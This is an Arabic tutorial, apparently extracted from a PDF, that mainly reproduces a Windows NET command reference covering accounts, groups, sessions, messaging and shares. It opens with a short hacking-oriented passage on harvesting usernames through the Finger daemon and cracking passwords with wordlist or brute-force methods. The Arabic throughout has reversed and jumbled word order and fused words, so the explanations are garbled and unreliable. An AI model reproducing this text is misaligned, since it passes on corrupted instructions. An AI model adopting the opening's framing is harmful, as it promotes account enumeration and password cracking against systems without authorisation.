Finger Deamon واحد ألي معلوماتضخم مصدر يكون أن يمكنيحاول

الدخول نظام ) access (كسب .إلىFinger deamon واسماء السر كلمات بنصف يزودك قانونيا

المستخدمينالدخول لكسب تحتاجها .access التي

عنها تبحث خاصة حسابات معرفة من تمكنك لطيفة خدع بضعة هناكبإستعمال ، الباسووردات كسر تستطيع الحسابات لهذه معرفتك من

.bruteforce أو wordlist تقنية " بأستعمال " أيضا موقع طريق عن األستعالم فوائد Finger تذكر

deamon.

9.االمر ".10 بإستخدام الشبكة إلدارة مختصر " NETشرح

> نورة موقع من >منقولبالكلمة تبدأ التي االتصال شبكة أوامر الخدمات من العديد تستخدمnet. أوامر المشتركة net تملك الخصائص بعض :هذه

أوامر بكافة قائمة مشاهدة بكتابة net يمكنك في ?/ net المتوفرةاألوامر  .موجه

ألمر األوامر سطر في الجملة بناء تعليمات على الحصول net يمكنككتابة طريق . net help command عن سبيل على األوامر موجه فياألمر تعليمات على للحصول net accounts المثال، ، مايلي  :اكتب

net help accountsأوامر كافة األوامر net تقبل على .)ال( n/ و )نعم( y/ خياراتسطراألمر يطالبك المثال، في net stop server سبيل رغبتك بتأكيد

يتجاوز بينما التابعة، الملقم خدمات كافة ،net stop server /y إيقافإيقاف على ويعمل بالتأكيد المطالبة تلقائيا، بنعم اإلجابة طريق عن

الملقم خدمة  .تشغيلاالقتباس عالمات استخدم فراغات، على يحتوي الخدمة اسم كان إذا

النص أي( حول ، "Service Name"(. األمر يشغل المثال، سبيل علىخدمة  :net logon التالي

net start "net logon"خدمات Net أوامر

Net accounts المرور كلمة ويعدل المستخدمين حسابات بيانات قاعدة يحدث

الحسابات جميع أجل من الدخول تسجيل .ومتطلباتالجملة بناء

net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage ays]

[/uniquepw:number] [/domain]المعلمات

/forcelogoff:{minutes | no} 

عمل جلسة إنهاء قبل انتظارها يجب التي الدقائق عدد تعينأو المستخدم حساب صالحية مدة تنتهي عندما ما ملقم مع مستخدم

. االفتراضية القيمة تمنع الصالح الدخول تسجيل وقت ، no ، منالمستخدمين على الخروج  .فرضتسجيل

/minpwlen:length حساب مرور كلمة أجل من األحرف لعدد األدنى الحد تعين

بين. ما النطاق يتراوح االفتراضي 127و 0المستخدم ويكون حرفا أحرف ستة  .هو

/maxpwage:{days | unlimited} الخاصة المرور كلمة فيها تكون التي األيام لعدد األقصى الحد تعين

. القيمة تعين صالحة المستخدم حد unlimited بحساب ليسهناك أنه . أوامر سطر خيار يكون أن يجب للوقت من maxpwage/ أقصى أكبر

/minpwage. بين ما النطاق 49,710و 1ويترواح يوما ) أن أيunlimited 49,710يكافئ يوما ( ، هي االفتراضية 90والقيمة يوما . 

/minpwage ays تغيير من المستخدم يتمكن أن قبل األيام لعدد األدنى الحد تعين

. هي االفتراضية القيمة جديدة مرور أنه 0كلمة تعين والتي يوما، . بين ما النطاق ويتراوح للوقت أدنى حد 49,710و 0ليسهناك يوما . 

/uniquepw:number المرات بعدد نفسها المرور كلمة المستخدم يكرر ال أن تتطلب

number . بين ما النطاق يتراوح المرور كلمة تغيير لعمليات 0المعين تكون 24و أن هو واالفتراضي المرور، كلمة تغيير عمليات من

مرور خمسكلمات بمقدار التغيير  . عمليات/domain 

. الحالي للمجال األساسية المجال تحكم وحدة على العملية تنجزالمحلي, الكمبيوتر على العملية تنفيذ يتم  .وإال

net help command ألمر التعليمات  .المحدد net تعرض

مالحظاتخدمة • تكون أن حيث Net Logon يجب الكمبيوتر على التشغيل قيد

. يعرض معلمات، دون االستخدام عند الحساب معلمات بتغيير ترغبnet accounts تسجيل وتحديدات المرور، لكلمة الحالية اإلعدادات

المجال ومعلومات  .الدخول،استخدام • من تتمكن أن قبل مايلي تنفيذ  :net accounts يجب

o . أو المستخدمين إدارة استخدم المستخدمين حسابات net إنشاءuser المستخدمين حسابات  .إلعداد

o خدمة من Net Logon تشغيل تتحقق التي الملقمات كافة على . تشغيل يتم المجال في الدخول بدء Net Logon تسجيل عند تلقائيا

 .التشغيلاستخدام • forcelogoff:minutes/ عند ، دقائق قبل تحذير إرسال يتم

. يتم المستخدمين على االتصال شبكة من الخروج فرضتسجيل من . إذا مفتوحة ملفات أية هناك كانت إذا فيما المستخدمين إعالم أيضابتسجيل minutes كانت المستخدمين تحذير يتم اثنين، من أقل

فورا االتصال شبكة من  .الخروجأمثلة

ما، ملقم ودور المرور، كلمة ومتطلبات الحالية، اإلعدادات لعرض:اكتب

net accountsحسابات مرور لكلمات أحرف بسبعة األدنى الحد لتعيين

اكتب :المستخدمين،

net accounts /minpwlen:7المستخدمين قبل من مرور كلمة استخدام إعادة إمكانية لتعيين

اكتب المرور، كلمات فيها يغيرون التي الخامسة المرة بعد :فقطnet accounts /uniquepw:5

أيام، سبعة كل من أكثر المرور كلمات تغيير من المستخدمين لمنعكل عليهم المرور كلمات تغيير وفرضتسجيل 30وفرض يوما،

مع الدخول تسجيل وقت صالحية مدة انتهاء بعد عليهم الخروجاكتب خمسدقائق، مدته :تحذير

net accounts /minpwage:7 /maxpwage:30 /forcelogoff:5أجل من المفعول سارية السابقة اإلعدادات تكون أن لضمان

اكتب إليه، الكمبيوتر دخول تسجيل تم الذي :المجالnet accounts /minpwage:7 /maxpwage:30 /domain

Net computer مجال بيانات قاعدة من كمبيوتر أجهزة يحذف أو .يضيف

الجملة بناءnet computer \\ComputerName {/add | /del}

المعلمات\\ComputerName 

المجال من حذفه أو إضافته لتتم الكمبيوتر  .تعين{/add | /del} 

المجال من المعين الكمبيوتر تزيل أو  .تضيفnet help command 

ألمر التعليمات  .المحدد net تعرضمالحظات

• Net computer أجهزة وحذف إضافة عمليات كافة توجيه يعيدالمجال تحكم وحدة إلى  .الكمبيوتر

أمثلةالكمبيوتر اكتب Grizzlybear إلضافة مجال، :إلى

net computer \\grizzlybear /add

Net config ويغير يعرض أو للتكوين، والقابلة التشغيل قيد الخدمات يعرض

. دون االستخدام عند العمل محطة خدمة أو الملقم خدمة إعداداتيعرض للتكوين net config معلمات، القابلة بالخدمات .قائمة

الجملة بناءnet config [{server|workstation}]

المعلماتserver 

بينما عليها تغييرات بإجراء لك وتسمح الملقم خدمة إعدادات تعرضالتشغيل قيد الخدمة  .تكون

workstation عليها تغييرات بإجراء لك وتسمح العمل محطة خدمة إعدادات تعرض

التشغيل قيد الخدمة تكون  .بينما/? 

األوامر موجه في التعليمات  .تعرضمالحظات

القابلة net config server استخدم الملقم خدمة إعدادات لتغييرودائمة. الحال في المفعول نافذة التغييرات تكون  .للتكوينباستخدام الملقم خدمة إعدادات كافة تغيير يمكنك net config ال

server. يعرض Net config server يمكنك ال التي التالية المعلومات :تكوينها

Server computer name Server comment 

Server version ) البرنامج إصدار رقم  )أي،Server is active on ) االتصال لشبكة وصف  )أي،

Server hidden ) اإلعداد  )hidden/ أي،Maximum logged on users ) المستخدمين لعدد األقصى الحد أي،

المشتركة الملقم موارد استخدام يمكنهم  )الذينMaximum open files per session ) ملفات لعدد األقصى الحد أي،

العمل جلسة أثناء المستخدمون يفتحها أن يمكن التي  )الملقمIdle session time )بالدقائق( 

العمل net config workstation استخدم محطة خدمة إعدادات لتغييرللتكوين  .القابلة

التالية Net config workstation يعرض  :المعلوماتComputer name 

Full computer name User name 

Workstation active on ) االتصال لشبكة وصف  )أي،Software version ) البرنامج إصدار رقم  )أي،

Workstation domain Workstation domain DNS name 

Logon domain COM open timeout )بالثواني( 

COM send count )بالبت( COM send timeout ) ثانية  )بالميللي

Net continue بواسطة مؤقت بشكل إيقافها تم خدمة .net pause يتابع

الجملة بناءnet continue service

المعلماتservice 

. بعض. التالي الجدول يسرد متابعتها تريد التي الخدمة تعين مطلوبة .service قيم

الوصف القيمةnetlogon خدمة .Net Logon تتابع

"nt lm security support provider" خدمة NT LM Security تتابعSupport Provider.

schedule المهام جدولة خدمة .تتابعserver الملقم خدمة .تتابع

workstation العمل محطة خدمة .تتابعnet help command 

ألمر التعليمات  .المحدد net تعرضمالحظات

• . مؤقتا الخدمة بإيقاف قم ما، مورد على صغير تصحيح إلجراءاألمر دون net continue استخدم الطابعة، أو الخدمة تنشيط إلعادة

المستخدم اتصاالت  .إلغاءكل • بحسب ومتابعتها مؤقتا الخدمة إيقاف تأثير يختلف أن يمكن

 .خدمة

عالمات • استخدم فراغات، على يحتوي الخدمة اسم كان إذاالنص ( االقتباسحول المثال سبيل على ، "Service Name"(. 

أمثلةالعمل محطة خدمة التالي األمر :يتابعnet continue workstation

اسم تضمين عليك أكثر، أو كلمتين يتألفمن الخدمة اسم كان إذا . خدمة لمتابعة المثال، سبيل على اقتباس عالمات ضمن NT الخدمة

LM Security Support Provider Service ، :اكتبnet continue "nt lm security support provider"

Net file وعدد ما ملقم على المفتوحة المشتركة الملفات كافة يعرضأسماء

. هذا يغلق ملف كل على وجودها، حال في الملفات، تأمين عملياتتأمين عمليات ويزيل الفردية المشتركة الملفات أيضا األمريعرض. معلمات، دون االستخدام عند قائمة net file الملفات

الملقم على المفتوحة .بالملفاتالجملة بناء

net file [ID [/close]]المعلمات

ID الملف تعريف رقم  .تعين

/close  . األمر هذا اكتب تأمينها تم التي السجالت وتحرر مفتوحا ملفا تغلق

الملف مشاركة تتم حيث الملقم على األوامر موجه  .منnet help command 

ألمر التعليمات  .المحدد net تعرضمالحظات

كتابة أيضا األمر net files يمكنك هذا  .لتشغيلاالتصال net file استخدم شبكة على المشتركة الملفات لعرض

. مشتركا ملفا المستخدم يترك بعضاألحيان، في بها والتحكم . ألجهزة يمكن ال هذا، حدوث عند الخطأ بطريق ومؤمنا مفتوحا

المؤمنة األجزاء إلى الوصول االتصال شبكة على األخرى الكمبيوتر . استخدم الملف . net file /close من إن الملف وإغالق التأمين إلزالة

لمايلي net file إخراج  :مشابهFile Path Username #locks

-------------------------------------------0 C:\A_FILE.TXT MARYSL 01 C:\DATABASE DEBBIET 2

أمثلةاكتب المشتركة، الملفات حول :لعرضمعلومات

net fileالتعريف رقم لديه ملف اكتب 1إلغالق ، :

net file 1 /close

Net group المجاالت في العمومية المجموعات يعدل أو يعرض، أو .يضيف،

الجملة بناءnet group [groupname [/comment:"text"]] [/domain]

net group [groupname {/add [/comment:"text"] | /delete} [/domain]]

net group [groupname username[ ...] {/add | /delete} [/domain]]المعلمات

groupname  . عين حذفها أو توسيعها، أو إضافتها، لتتم المجموعة اسم تعين

فقط المجموعة في المستخدمين قائمة لعرض مجموعة  .اسم/comment:"text" 

. التعليق يحتوي أن يمكن موجودة أو جديدة لمجموعة تعليقا تضيف. 48على اقتباس عالمات النصضمن بتضمين قم أقصى كحد حرفا . 

/domain  , . يتم وإال الحالي المجال في المجال تحكم وحدة على العملية تنفذ

المحلي الكمبيوتر على العملية  .تنفيذ/add 

. تأسيس يجب مجموعة إلى مستخدم اسم تضيف أو تضيفمجموعة،هذا باستخدام المجموعة إلى تضيفهم الذين للمستخدمين حساب

 .األمر/delete 

مجموعة من مستخدم اسم تزيل أو مجموعة،  .تزيلUserName[ ...] 

إلى إضافته لتتم المستخدمين أسماء من أكثر أو واحد اسم تسرد . المستخدمين أسماء إدخاالت افصل منها إزالته لتتم أو مجموعة

بفراغات  .المتعددةnet help command 

ألمر التعليمات  .المحدد net تعرضمالحظات

يعرض معلمات، دون االستخدام وأسماء net group عند الملقم اسمعليه الموجودة  .المجموعاتكتابة أيضا  .net groups يمكنك

شبكة net group استخدم يستخدمون الذين المستخدمين لتجميع . حقوق تعين عندما بنفسالطرق أو متشابهة بطرق االتصال

الحقوق هذه يملك المجموعة في عضو كل فإن ما، لمجموعةيسبق. اإلخراج، في تتضمن net group تلقائيا التي المجموعات

النجمية بالعالمة واحد بآن ومجموعات  .)*( مستخدمينلمايلي net group إخراج مشابه الملقم على :للمجموعات

Group Accounts for \\PRODUCTION----------------------------------------------*Domain Admins *Domain Users

أمثلةالمحلي، الملقم على الموجودة المجموعات بكافة قائمة لعرض

:اكتبnet group

تدعى مجموعة المستخدمين nor إلضافة حسابات بيانات قاعدة إلىاكتب :المحلية،

net group NOR /addتدعى مجموعة اكتب nor إلضافة المجال، بيانات قاعدة :إلى

net group NOR /add /domainالموجودة المستخدمين حسابات stevev إلضافة ، ralphr و ، jennyt و

المجموعة اكتب nor إلى المحلي، الكمبيوتر :علىnet group NOR stevev ralphr jennyt /add

الموجودة المستخدمين حسابات stevev إلضافة ، ralphr و ، jennyt والمجموعة اكتب nor إلى المجال، بيانات قاعدة :في

net group NOR stevev ralphr jennyt /add /domainالمجموعة في المستخدمين nor لعرض ، :اكتب

net group NOR

Net help الحصول يمكنك التي االتصال شبكة ومواضيع بأوامر قائمة يوفر

. عند معين أمر حول معلومات يوفر أو بها، الخاصة التعليمات علىيعرض معلمات، دون والمواضيع net help االستخدام باألوامر قائمة

بها الخاصة التعليمات على الحصول يمكنك .التيالجملة بناء

net help [command]المعلمات

command /help 

األمر وتعليمات الصحيح الجملة بناء  .تعرضبه الخاصة التعليمات تريد الذي األمر  .تعين

أمثلةباألمر الخاصة التعليمات net use لعرض ، :اكتب

net help useاكتب :أو

net use /helpلألمر الجملة بناء اكتب net help لعرض :فقط،

net help /?

Net helpmsg المشكلة لحل معلومات ويوفر خطأ حدوث سبب .يفسر

الجملة بناءnet helpmsg message#

المعلماتmessage# 

الحصول. تريد التي للرسالة األربعة الخانات ذو الرقم تعين مطلوبةحولها المعلومات من المزيد  .على

net help command ألمر التعليمات  .المحدد net تعرض

مالحظاتلمايلي مشابهة رسالة تظهر االتصال، شبكة عمل فشل  :عند

2182: The requested service has already been started.أمثلة

بالخطأ اإلعالم رسالة حول المعلومات من المزيد على للحصولNET 2182 ، :اكتبnet helpmsg 2182

Net localgroup  . االستخدام عند يعدلها أو يعرضها، أو الحلية، المجموعات يضيف

يعرض معلمات، وأسماء net localgroup دون الملقم اسمالكمبيوتر على المحلية .المجموعات

الجملة بناءnet localgroup [GroupName [/comment:"text"]] [/domain]

net localgroup [GroupName {/add [/comment:"text"] | /delete} [/domain]]

net localgroup [GroupName name [ ...] {/add | /delete} [/domain]]المعلمات

GroupName . حذفها أو توسيعها، أو إضافتها، لتتم المحلية المجموعة اسم تعين

يعرض إضافية، معلمات دون االستخدام net localgroup عندGroupName في العمومية المجموعات أو بالمستخدمين قائمة

المحلية  .المجموعة/comment:"text" 

. التعليق يحتوي أن يمكن موجودة أو جديدة لمجموعة تعليقا تضيف. 48حتى اقتباس عالمات النصضمن بتضمين قم حرفا . 

/domain . الحالي للمجال األساسية المجال تحكم وحدة على العملية تنفذ

المحلي, الكمبيوتر على العملية تنفيذ يتم  .وإالname [ ...] 

المجموعات أو المستخدمين أسماء من أكثر او واحدا اسما تسردمحلية مجموعة من إزالتها أو إضافتها  .لتتم

/add . محلية مجموعة إلى مستخدم اسم أو عمومية مجموعة اسم تضيف

العمومية المجموعات أو للمستخدمين تأسيسحساب أوال عليكاألمر هذا بواسطة محلية مجموعة إلى إضافتها من تتمكن أن  .قبل

/delete محلية مجموعة من مستخدم اسم أو مجموعة اسم  .تزيل

net help command ألمر التعليمات  .المحدد net تعرض

مالحظات domain/ استخدام

كمبيوتر domain/ تطبق أجهزة على Windows XP فقطProfessional . كمبيوتر أجهزة تنفذ افتراضيا، ما مجال في األعضاء

األساسية المجال تحكم وحدة على العمليات .الملقم name استخدام

. تكون أن يمكن فراغات باستخدام المتعددة اإلدخاالت افصلعلى مستخدمين أو محليين، مستخدمين عن عبارة األسماء

من تكون أن يمكن ال لكن عمومية، مجموعات أو األخرى، المجاالت . آخر، مجال من المستخدم كان إذا األخرى المحلية المجموعات

المجال باسم المستخدم اسم ( استهل المثال سبيل على ، Sales\Ralphr(.

المستخدمين  تجميعيستخدمون net localgroup استخدم الذين المستخدمين لتجميع

. عند بنفسالطرق أو متشابهة بطرق االتصال شبكة أو الكمبيوترالمجموعة في عضو كل فإن محلية، لمجموعة الحقوق تعيين

نفسها الحقوق تلقائيا يملك .المحليةأمثلة

اكتب المحلي، الملقم على المحلية المجموعات بكافة قائمة :لعرضnet localgroup

تدعى محلية مجموعة حسابات Exec إلضافة بيانات قاعدة إلىاكتب المحلية، :المستخدمين

net localgroup exec /addتدعى محلية مجموعة حسابات Exec إلضافة بيانات قاعدة إلى

اكتب المجال، :مستخدميnet localgroup exec /add /domain

الموجودة المستخدمين حسابات stevev إلضافة ، من( ralphr و)Sales المجال ، المحلية jennyt و المجموعة الكمبيوتر Exec إلى على

اكتب :المحلي،net localgroup exec stevev sales\ralphr jennyt /add

الموجودة المستخدمين حسابات stevev إلضافة ، ralphr و ، jennyt والمجموعة اكتب Exec إلى :لمجال،

net localgroup exec stevev ralphr jennyt /add /domainالمحلية المجموعة في المستخدمين :اكتب Exec لعرض

net localgroup execالمحلية المجموعة سجل إلى تعليق Exec إلضافة ، :اكتب

net localgroup exec /comment:"The executive staff."

Net pause  حاليا التشغيل قيد للخدمات المؤقت التوقف .يسبب

الجملة بناءnet pause service

المعلماتservice 

. التالي. الجدول يسرد مؤقتا إيقافها تريد التي الخدمة تعين مطلوبة .service بعضقيم

الوصف القيمةnetlogon الخدمة إيقاف إلى .مؤقتا Net Logon تؤدي

"nt lm security support provider" الخدمة إيقاف إلى NT LM تؤديSecurity Support Provider مؤقتا.

schedule مؤقتا المهام جدولة إيقافخدمة إلى .تؤديserver مؤقتا الملقم خدمة إيقاف إلى .تؤدي

workstation مؤقتا العمل محطة إيقافخدمة إلى .تؤديnet help command 

ألمر التعليمات  .المحدد net تعرضمالحظات

استخدم ما، ملقم للسماح net pause على الخدمة إيقاف قبل . التوقف إن بالموارد االتصال قطع أو المهام بإتمام للمستخدمين

من البرنامج يزيل ال لكنه حجز، حالة في يضعها للخدمة المؤقتإنهاء. بالمورد مسبق اتصال لديهم الذين للمستخدمين يمكن الذاكرة

بالمورد الجديدة االتصاالت منع يتم ولكن بهم، الخاصة  .المهام أوال قم المشتركة، الموارد على تؤثر خدمة إليقاف تخطط كنت إذا

. استخدم مؤقتا ستعمل net send بإيقافها بأنك تفيد رسالة لبث . من لالنتهاء الكافي بالوقت األشخاص تزويد بعد الخدمة إيقاف على

استخدم المورد، الخدمة net stop استخدام .إليقافاستخدم مؤقتا، إيقافها تم خدمة تنشيط .net continue إلعادة

. على المؤقت التوقف يؤثر مؤقتا الخدمات كافة إيقاف يمكنك الالتالية باألشكال  :الخدمات

لخدمة المؤقت اإليقاف معالجة Net Logon إن من الكمبيوتر يمنع . دخول تسجيل ملقمات للمجال كان إذا الدخول تسجيل طلباتشبكة إلى المستخدمين دخول تسجيل يستمر أن يمكن أخرى،

 .االتصالإجراء من المستخدمين يمنع الملقم لخدمة المؤقت اإليقاف إن . وجود عدم حال في للملقم المشتركة بالموارد جديدة اتصاالت

يمنع ذلك فإن االتصال، شبكة على أخرى دخول تسجيل ملقمات . تتأثر ال االتصال شبكة إلى الدخول تسجيل من المستخدمين

. الملقم مع اتصاالت إجراء للمسؤولين يمكن الموجودة االتصاالتمؤقت بشكل إيقافه تم إذا  .حتى

المستخدم، اسم يحفظ العمل محطة لخدمة المؤقت اإليقاف إنأجل من الطلبات يوجه ولكنه معرفة، واالتصاالت المرور، وكلمة

الطابعات من بدال بالكمبيوتر المتصلة الطابعات إلى الطباعة أجهزةبالشبكة  .المتصلة

االقتباس عالمات استخدم فراغات، على يحتوي الخدمة اسم كان إذاالنص ( حول المثال سبيل على ، "Service Name"(. 

أمثلةاكتب مؤقت، بشكل الملقم خدمة :إليقاف

net pause serverاسم تضمين عليك أكثر، أو كلمتين يتألفمن الخدمة اسم كان إذا

. الخدمة إليقاف المثال، سبيل على اقتباس عالمات ضمن الخدمة"NT LM Security Support Provider" اكتب :مؤقتا،

net pause "nt lm security support provider"

Net print يعرض أو معينة، طباعة انتظار قائمة حول يعرضمعلومات

من استضافتها تتم التي الطباعة انتظار قوائم كافة حول معلوماتطباعة مهمة حول يعرضمعلومات أو معين، طباعة ملقم قبل

. يعرض معلمات، دون االستخدام عند بها يتحكم أو net print معينة،لألمر األوامر .net print تعليماتسطر

كافة حول أو معينة طباعة انتظار قائمة حول لعرضمعلوماتطباعة ملقم قبل من استضافتها تتم التي الطباعة انتظار قوائم

معينالجملة بناء

net print \\ComputerName[\QueueName]المعلمات

\\ComputerName انتظار. قائمة يستضيف الذي الكمبيوتر االسم، حسب تعين، مطلوبة

بها المتعلقة المعلومات بعرض ترغب التي  .الطباعة\QueueName 

بعرض ترغب التي الطباعة انتظار قائمة االسم، حسب تعين، . قائمة تعيين وعدم كمبيوتر تعيين حال في بها الخاصة المعلومات

الطباعة انتظار قوائم بكافة المتعلقة المعلومات عرض يتم انتظار،المعين الكمبيوتر  .على

net help net print باألمر الخاصة التعليمات  .net print تعرض

مالحظاتانتظار Net print يعرض بقوائم المتعلقة المعلومات من أنواع عدة

قوائم. بكافة يتعلق تقرير عن مثال هو التالي المثال الطباعةالمسمى الملقم على الطباعة  :NOR2000 انتظارعند الطابعة انتظار NOR2000\\ قوائم

Name Job # Size Status

---------------------------------------------------------

LASER Queue 1 jobs *Queue Active*

USER1 84 0 Spooling

أمثلةالطباعة انتظار قائمة محتويات الكمبيوتر Dotmatrix لسرد \\ على

NOR2000 ، :اكتبnet print \\NOR2000\dotmatrix

بها التحكم أو معينة طباعة مهمة حول لعرضمعلوماتالجملة بناء

net print [\\ComputerName] JobNumber [{/hold | /release | /delete}]المعلمات

\\ComputerName التي الطباعة يستضيفمهمة الذي الكمبيوتر االسم، حسب تعين،

. الكمبيوتر افتراض يتم كمبيوتر، تعين لم إذا بها التحكم تريد .المحلي

JobNumber  . تعيين. يتم بها التحكم تريد التي الطباعة مهمة رقم تعين مطلوبة

الطباعة انتظار قائمة يستضيف الذي الكمبيوتر قبل من الرقم هذا . رقما الكمبيوتر يعين أن بعد إليها الطباعة مهمة إرسال تم التي

في أخرى طباعة مهمة ألي الرقم هذا تعيين يتم ال الطباعة، لمهمةالكمبيوتر ذلك قبل من استضافتها تتم انتظار قائمة  .أي

{/hold | /release | /delete}  . المعلمة تؤخر الطباعة مهمة مع اتخاذه يجب الذي اإلجراء تعين

/hold أن إلى بتجاوزها األخرى الطباعة لمهام يسمح مما المهمة، . المعلمة تحرر تحريرها . release/ يتم تأخيرها تم التي الطباعة مهمةالمعلمة . delete/ تزيل في الطباعة انتظار قائمة من الطباعة مهمة

المعلومات عرض يتم إجراء، أي تعيين وعدم للمهمة رقم تعيين حالالطباعة بمهمة  .المتعلقة

net help net print باألمر الخاصة التعليمات  .net print تعرض

مالحظاتطباعة بمهمة يتعلق تقرير عن مثال هو التالي  :المثال

Job # 20

Status Waiting

Size 309

Remark

Submitting user HISHEM

Notify HISHEM

Job data type

Job parameters 

Additional info

أمثلةالرقم ذات المهمة حول الكمبيوتر 20لعرضمعلومات على \\

NOR2000 ، :اكتب

net print \\NOR2000 20 الرقم ذات المهمة الكمبيوتر 20لتأخير على \\NOR2000 ، :اكتب

net print \\NOR2000 20 /holdالرقم ذات المهمة الكمبيوتر 20لتحرير على \\NOR2000 ، :اكتب

net print \\NOR2000 20 /release

Net send أسماء أو كمبيوتر، أجهزة أو مستخدمين، إلى الرسائل يرسل

االتصال شبكة على أخرى .مراسالتالجملة بناء

net send {name | * | /domain[:name] | /users} messageالمعلمات

name التي المراسلة اسم أو الكمبيوتر، اسم أو المستخدم، اسم تعين . تحتوي توفرها التي المعلومات كانت إذا إليها الرسالة إرسال تريدالنص االقتباسحول عالمات استخدم فراغات، ( على سبيل على

المثال ، "Computer Name"(. الطويلة المستخدمين أسماء تؤدي ربماكأسماء استخدامها عند مشاكل حدوث تحديد .NetBIOS إلى يتم

السادسعشر 16بـ NetBIOS أسماء الحرف حجز ويتم حرفا، . * 

في أو المجال في الموجودة األسماء كافة إلى الرسالة ترسلبك الخاصة العمل  .مجموعة

/domain:name . الكمبيوتر مجال في الموجودة األسماء كافة إلى الرسالة ترسل

تعيين الموجودة name يمكنك األسماء كافة إلى الرسالة إلرسالالمعينة العمل مجموعة في أو المجال  .في

/users بالملقم المتصلين المستخدمين كافة إلى الرسالة  .ترسل

message الرسالة. نص تعين  .مطلوبة

net help command ألمر التعليمات  .المحدد net تعرض

مالحظات• . فقط الشبكة على موجود نشط اسم إلى رسالة إرسال يمكنك

تم قد يكون أن يجب مستخدم، اسم إلى الرسالة إرسال حال فيلتلقي المرسل خدمة وتشغيل المستخدم هذا دخول تسجيل

 .الرسالةالكمبيوتر • مجال في الموجودة األسماء كافة إلى رسالة بث يمكنك

( الخاصبك أو * )domain/ استخدم ، مختلف مجال في أو)/domain:DomainName(. على البث رسائل تحتوي أن 128يمكن

. مستخدمين عدة إلى الرسائل إرسال عند انتبه أقصى كحد  .حرفالك • الذين users/ تسمح المستخدمين كافة إلى رسالة بإرسال

. عدة إلى الرسائل إرسال عند انتبه الملقم مع عمل جلسات لديهم .مستخدمين

• . من لمزيد الرسائل استالم ليتم المرسل خدمة تشغيل يجبصلة ذات مواضيع راجع خدمة، تشغيل كيفية حول  .المعلومات

أمثلةالرسالة إلى ".Meeting changed to 3 P.M. Same place" إلرسال

robertf المستخدم ، :اكتبnet send robertf Meeting changed to 3 P.M. Same place.

اكتب بالملقم، المتصلين المستخدمين كافة إلى رسالة :إلرسالnet send /users This server will shut down in 5 minutes.

اكتب )/( ، المائل الخط عالمة تتضمن رسالة :إلرسالnet send robertf "Format your disk with FORMAT /4"

Net session  . دون االستخدام عند الملقمات كمبيوتر أجهزة اتصاالت يدير

يعرض مع net session معلمات، العمل جلسات كافة حول معلوماتالمحلي .الكمبيوتر

الجملة بناءnet session [\\ComputerName] [/delete]

المعلمات\\ComputerName 

قطع أو العمل جلسات سرد تريد أجله من الذي الكمبيوتر تعرف .اتصالها/delete 

مع الكمبيوتر عمل جلسة كافة ComputerName تنهي وتغلق . تم إذا هذه العمل جلسة أجل من الكمبيوتر على المفتوحة الملفات

ComputerName حذف ، الكمبيوتر على العمل جلسات كافة إلغاء يتم .المحلي

net help command ألمر التعليمات  .المحدد net تعرض

تحذيراستخدام . net session إن ربما البيانات فقدان إلى يؤدي أن يمكنالعمل جلسة اتصال قطع قبل المستخدمين بتحذير  .ترغب

مالحظاتاستخدام أيضا net لتشغيل net sess أو net sessions يمكنك

session. وأسماء net session استخدم الكمبيوتر أجهزة لعرضأسماء

إذا ما ولمعرفة الملقم، على الموجودين للمستخدمين المستخدمينتعطيل مدة ولمعرفة مفتوحة، ملفات المستخدمين لدى كان

مستخدم لكل العمل  .جلساتلمايلي مشابه بتنسيق المعلومات  :تظهر

Computer User name Client type Opens Idle time

------------------------------------------------------------------------\\BASSETT CHRISDR Windows 2000 1 00:00:13

\\SHARONCA Administrator DOS LM 2.1 0 01:05:13استخدم واحد، مستخدم عمل مع ComputerName لعرضجلسة

بالموارد. قائمة وحيد بمستخدم المتعلقة المعلومات تتضمن األمرالمستخدم بها يتصل التي  .المشتركة

على الموجود المستخدم يتصل عندما العمل جلسة تسجيل يتم . عندما الناجحة العمل جلسة تحدث بالملقم ناحج بشكل العميل

يكون وعندما نفسالشبكة، على موجودين الكمبيوتر جهازي يكون . أن يجب الملقم قبل من مقبولين مرور وكلمة اسم المستخدم لدى

الملقم مع عمل جلسة العميل على الموجود المستخدم لدى يكونالعمل تأسيسجلسة يتم وال الملقم، موارد استخدام إمكانية قبل

. بين يكون ما بمورد العميل على الموجود المستخدم يتصل أن إلىيكون أن يمكن ولكن فقط، واحدة عمل جلسة والملقم العميل

بالموارد االتصاالت، أو اإلدخال، نقاط من العديد  .لديهما

قبل معطلة العمل جلسة خالله تبقى أن يمكن الذي الوقت لتعيينالميزة عين تلقائيا، اتصالها قطع يتم باستخدام autodisconnect أن

net config server /autodisconnect. حول المعلومات من net لمزيدconfig server ، . التلقائي االتصال قطع يكون صلة ذات مواضيع راجع

تلقائيا العمل جلسة اتصال إعادة تتم ألنه للمستخدم بالنسبة شفافاثانية مرة المورد إلى المستخدم يصل  .عندما

استخدم الملقم، مع العمل جلسة \\ net session إلنهاءComputerName /delete. 

أمثلةاكتب المحلي، للملقم العمل جلسة معلومات عن :لعرضسرد

net sessionالكمبيوتر اسم ذو للعميل العمل جلسة ،Shepherd لعرضمعلومات

:اكتبnet session \\shepherd

اكتب به، المتصلين والعمالء الملقم بين العمل جلسات كافة :إلنهاءnet session /delete

Net statistics أو المحلية، العمل محطة أو الملقم لخدمة اإلحصائيات يعرضسجل

. االستخدام عند لها اإلحصائيات تتوفر والتي التشغيل قيد للخدماتيسرد معلمات، تتوفر net statistics دون التي التشغيل قيد الخدمات

لها .اإلحصائياتالجملة بناء

net statistics [{workstation | server}]المعلمات

workstation المحلية العمل محطة خدمة إحصائيات  .تعرض

server المحلي الملقم خدمة إحصائيات  .تعرض

net help command ألمر التعليمات  المحدد net تعرض

Net view تتم التي الموارد أو الكمبيوتر، أجهزة أو المجاالت، قائمة يعرض

. معلمات، دون االستخدام عند المعين الكمبيوتر قبل من مشاركتهاالمجال net view يعرض في الموجودة الكمبيوتر بأجهزة قائمة

.الحاليالجملة بناء

net view [\\ComputerName] [/domain[:DomainName]]net view /network:nw [\\ComputerName]

المعلمات\\ComputerName 

تريد التي المشتركة الموارد على يحتوي الذي الكمبيوتر تعين .عرضها

/domain[:DomainName]  . تم إذا فيه المتوفرة الكمبيوتر عرضأجهزة تريد الذي المجال تعينDomainName حذف ، في domain/ يعرض الموجودة المجاالت كافة

 .الشبكة/network:nw 

شبكة على المتوفرة الملقمات كافة حال .NetWare تعرض في

يعرض كمبيوتر، اسم ذلك network:nw/ تعيين على المتوفرة المواردشبكة في االتصال .NetWare الكمبيوتر شبكات تعيين أيضا يمكنك

النظام إلى إضافتها تمت التي  .األخرىnet help command 

